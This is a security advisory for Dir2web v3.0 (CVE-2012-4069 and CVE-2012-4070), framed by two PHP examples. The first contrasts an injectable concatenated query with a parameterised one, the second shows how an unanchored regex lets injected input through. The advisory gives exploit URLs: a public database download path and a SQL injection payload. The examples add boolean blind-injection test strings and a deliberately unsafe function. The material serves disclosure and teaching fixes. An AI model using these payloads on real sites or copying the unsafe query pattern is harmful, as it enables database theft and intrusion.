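function fetchFileUnsafe(PDO $db, string $id): array
{
    $res = $db->query(
        'SELECT id, name, filename, size, type, date'
        . ' FROM dsfile'
        . ' WHERE id=' . $id
    );
    return $res->fetchAll(PDO::FETCH_ASSOC);
}

// Hardened: reject anything that is not a plain positive integer, then bind
// the value as a parameter so it can never change the query's structure.
function fetchFileSafe(PDO $db, string $id): array
{
    if (!preg_match('/^[1-9][0-9]{0,9}\z/', $id)) {
        throw new InvalidArgumentException('id must be a positive integer');
    }
    $stmt = $db->prepare('SELECT id, name, filename, size, type, date'
        . ' FROM dsfile WHERE id = :id');
    $stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

$db = openDemoDb();

// Constructed inputs in the shape the advisory describes: a true and a false
// condition appended to a valid id. On the unsafe path the row count differs
// (1 vs 0), which is exactly the boolean oracle that blind injection relies on.
foreach (['1 AND 1=1', '1 AND 1=2'] as $tampered) {
    printf("unsafe %-10s -> %d row(s)\n", $tampered, count(fetchFileUnsafe($db, $tampered)));
    try {
        fetchFileSafe($db, $tampered);
        echo "safe   $tampered -> accepted (unexpected)\n";
    } catch (InvalidArgumentException $e) {
        echo "safe   $tampered -> rejected before any SQL was built\n";
    }
}
printf("safe   %-10s -> %d row(s)\n", '1', count(fetchFileSafe($db, '1')));
```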


Dir2web3 Multiple Vulnerabilities

2012-08-06 Thread Daniel Correa
Title:
==
Dir2web3 Multiple Vulnerabilities

Date:
=
05/08/2012

Author:
===
Daniel Correa (http://www.sinfocol.org/)

Vulnerable software:

Dir2web v3.0 (http://www.dir2web.it/)

CVE:

CVE-2012-4069
CVE-2012-4070

Details:

There are two vulnerabilities identified on Dir2web v3.0:

Information disclosure (CVE-2012-4069):
Database folder is public and it is not protected via .htaccess. An attacker
can download the entire database and look for hidden pages on the website.

SQL Injection (CVE-2012-4070):
The preg_match function is not enough to protect GET/POST parameters. An
attacker can easily perform a SQL Injection against the application.

Exploit:

Information disclosure:
http://site/_dir2web/system/db/website.db

SQL Injection:
http://site/index.php?wpid=homepage&oid=6a303a0aaa' OR id  0-- -

Patch:
==
Information disclosure:
Create .htaccess file on _dir2web folder with the following content:
Order deny,allow
Deny from all

SQL Injection:
Fix the regular expression in dispatcher.php file located on
_dir2web/system/src folder.

Replace:
'/[a-zA-Z0-9]{10}/'
With:
'/^[a-zA-Z0-9]{10}$/'

Timeline:
=
13/07/2012: Vendor contacted
25/07/2012: CERT contacted
27/07/2012: CVE assigned
05/08/2012: Vulnerability published on Bugtraq

-- 
Regards,
Daniel Correa
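
As an added example that is not part of the advisory or of Dir2web's code, the following PHP shows why the shipped pattern accepts the PoC-shaped 'oid' value, what the anchored replacement fixes, and one trailing-newline edge case that `$` alone still lets through; the constant and function names are hypothetical.

```php
<?php
// Added example, not Dir2web's code: why the unanchored pattern from
// dispatcher.php accepts an injected 'oid', what the anchored pattern fixes,
// and an edge case it still misses. Constant and function names are hypothetical.

declare(strict_types=1);

const OID_UNANCHORED = '/[a-zA-Z0-9]{10}/';     // as shipped: a match anywhere is enough
const OID_ANCHORED   = '/^[a-zA-Z0-9]{10}$/';   // the suggested patch
const OID_STRICT     = '/^[a-zA-Z0-9]{10}\z/';  // \z: no trailing newline allowed

function oidIsValid(string $oid, string $pattern): bool
{
    return preg_match($pattern, $oid) === 1;
}

// Constructed inputs: a genuine 10-character id, the shape of the advisory's
// PoC (a valid id followed by a quote and SQL), and two edge cases.
function checkInputs(): array
{
    $inputs = [
        '6a303a0aaa',              // legitimate id
        "6a303a0aaa' OR 1=1-- -",  // id followed by injected SQL
        'short',                   // too short
        "6a303a0aaa\n",            // trailing newline
    ];
    $rows = [];
    foreach ($inputs as $oid) {
        $rows[$oid] = [
            'unanchored' => oidIsValid($oid, OID_UNANCHORED),
            'anchored'   => oidIsValid($oid, OID_ANCHORED),
            'strict'     => oidIsValid($oid, OID_STRICT),
        ];
    }
    return $rows;
}

// The unanchored pattern passes the injection string because it contains a
// 10-character alphanumeric run; ^...$ stops that. ^...$ still passes a value
// with a trailing "\n" because PCRE's $ matches before a final newline, so use
// \z (or the D modifier) when the whole value must be exactly the id.
foreach (checkInputs() as $oid => $r) {
    printf("%-26s unanchored=%d anchored=%d strict=%d\n",
        json_encode($oid), $r['unanchored'], $r['anchored'], $r['strict']);
}
```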


